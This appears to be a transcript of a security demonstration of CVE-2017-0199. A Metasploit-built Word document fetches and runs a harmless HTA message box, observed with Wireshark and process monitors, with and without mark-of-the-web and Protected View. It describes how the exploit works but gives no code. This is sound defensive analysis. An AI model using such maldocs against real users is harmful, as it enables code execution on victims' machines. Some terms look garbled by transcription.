 Hello, I'm going to demonstrate CVE 2017 0199 that has been created, that malicious file has been created with Metasploit, so I have two versions here, test and test Markov web and I have a process explorer, Wireshark and process monitor running. Let's start process monitor like this. Now I'm opening this file, it worked. I put word here, you get this message, but if you look beneath here, you have here this message box hello from HTA. This is the HTML application that has been downloaded and executed without me clicking anything, just opening the document. If we look into Wireshark here and we filter for frames that contain DDA, you can see a request to ddstames.com and then an HTTP request for test.hda on my website and if we follow the HTTP stream, you can see here the test request and here the reply with a content type application hda and here the HTML application, very simple, it just displays a message box. If we look into process explorer, we have winword, no child processes, but if we have a look here, here we have the HTML application engine that was started. We can see that in process monitor, if we look at the process tree, here you can see that we started Word by opening the document and here you can see that MSHTA was launched to launch the HTA file that was downloaded from my site. I'm going to click here, then I get the HTA application, no, that's another message you get, and then we close, we don't save. So that was a file generated with Metasploit. I have the same file here generated with Metasploit, but I also put a mark of the web on it. You see here this file came from another computer and might be blocked to help protect this computer. So this file is with a mark of the web as it is, for example, downloaded with Internet Explorer or saved with Outlook. So let's restart this Wireshark capture and also the process monitor and now we open this and now because it is mark of the web, we are in protected view and you will see, so let's filter this like this. You see there are no requests here, HTTP requests to download from my site and also if we look into the process tree, the MSHTA application has not been launched. Word is launched and this is the sandbox. Let's start again. Let's clear this and now we are going to say enable editing. So leave the protected view mode, leave the sandbox and then you can see that the HTA was executed again. So let's close all this. So the file here actually was not downloaded again because it's already present. My machine was already downloaded once and if we go into process tree, you can see here HTA that was launched.